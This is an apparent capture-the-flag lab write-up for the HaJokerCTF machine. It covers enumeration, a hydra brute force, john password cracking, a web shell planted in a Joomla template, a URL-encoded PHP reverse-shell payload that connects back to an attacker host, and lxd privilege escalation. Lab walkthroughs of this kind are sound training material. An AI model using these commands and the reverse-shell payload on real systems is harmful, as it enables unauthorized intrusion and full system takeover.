HaJokerCTF

Target IP: 10.10.117.63


Scanning

0601b68ca8644aa797a4e3652ee14ab3.png
5116fffb80156cdbfb14018c18ecb0b5.png
There are three TCP ports open on the target machine: SSH, HTTP, and another HTTP application.


Enumeration

Port 80: HTTP
018ad52a255b36486c3c921383d63430.png
The webpage above is displayed for this application. Viewing the source-code of this webpage displays the different Joker quotes.

a285dfc18db37a0840b320f79e5d15fd.png
Running a directory search using the command gobuster dir -u http://10.10.117.63 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt against this application displays the important details above. The phpinfo.php provides more information about the host, such as PHP version.

c49f1adcb4ec13ea62c79b35939d8a89.png
The secret.txt contains the message above. This message contains two possible usernames we can target the SSH and other HTTP application if it supports login: Batman and Joker. I tried finding other directories using other wordlists but I could not.

Port 8080: HTTP
1941dc16d8e9b3adc1e6c58d38c2e56f.png
This application requests me to login. When using curl against this port, the output above is shown.

0bca7e272ced771ae8fff8305b4c4f2a.png
Using hydra and the command hydra -l joker -P /usr/share/wordlists/rockyou.txt 10.10.117.63 -s 8080 http-get, I managed to crack the password for the user joker for the HTTP application on the higher port. Now I have the credential joker:hannah.

1ca877ba37108821f8e1d650321797d1.png
I managed to login using the credential above. Now I have access to the CMS.

49c845957a2e7c33b0162ef051ca944d.png
Browsing to /robots.txt contains the entries above.

8edead75442c144314be2cae4fffe74d.png
The /administrator looks interesting as it is the admin panel but I need the username and password. Firing default credentials did not work either.

220a82c778739ec176d675c32c9b7ddc.png
Performing a directory search with the login shows an interesting file called backup.zip. I downloaded this file on my machine but it is password protected.

26a96e5bf9b35c125f60bce1292682d4.png
Using john I obtained the password of this backup.zip file. It is hannah.

335c4cd0ab797bac02d9e1cc0c021471.png
I found an interesting file called configuration.php. This file contains the username and password in plaintext for the application. However, I was unable to login using this. I also notice the name of the database for this application is joomladb.

a5816f7843063636deedc227f8d37d30.png
When looking through the contents of joomladb.sql, I notice an interesting table as shown above. There is a user called admin with the password hash of $2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG. I copied this password hash to my local machine.

d5f50afe8b52126e184710df2b741c47.png
After running john on the new password hash, I obtained the password abcd1234 for the user admin. I should be able to login to the Joomla administrator panel now.


Exploitation

e39536aadb3a8db42140e9f2689d3de7.png
And boom! I now have access to the Joomla application using admin:abcd1234. Time to upload a reverse-shell!

918c81ab6e2281a214cbcc0b5872e04c.png
I notice the Templates can be changed for Protostar. I will inject my simple web-shell at error.php, as shown above.

314f0923bcbb3e27558aca6b5112772c.png
And my web-shell got uploaded and I can perform RCE on it. I browsed to http://10.10.117.63:8080/templates/protostar/error.php to execute commands. Time to gain a full reverse shell connection now.

f30378668eb261adb541a28a863ccdba.png
And now I have a full reverse shell connection on port 8443. The PHP payload used is listed below. Time to escalate privileges to root!

PHP payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
Full URL with payload: http://10.10.117.63:8080/templates/protostar/error.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.


Privilege Escalation

5506ca5a153a109f19d195cddf1819a1.png
What? www-data is in the lxd group? Looks like I can use this to gain a root shell.

e7649f56e18a89a511b9be00cc8de4fb.png
766e0aa1596d05227f2cbd30df6e8f32.png
I downloaded alpine-v3.13-x86_64-20210218_0139.tar.gz on my machine and transferred it to the target machine. Now I have a root shell.


Flags

33c5ff20dd75130851455f4ec4efd9d6.png
The final flag is at new mount /mnt/root/root with the name final.txt. GG.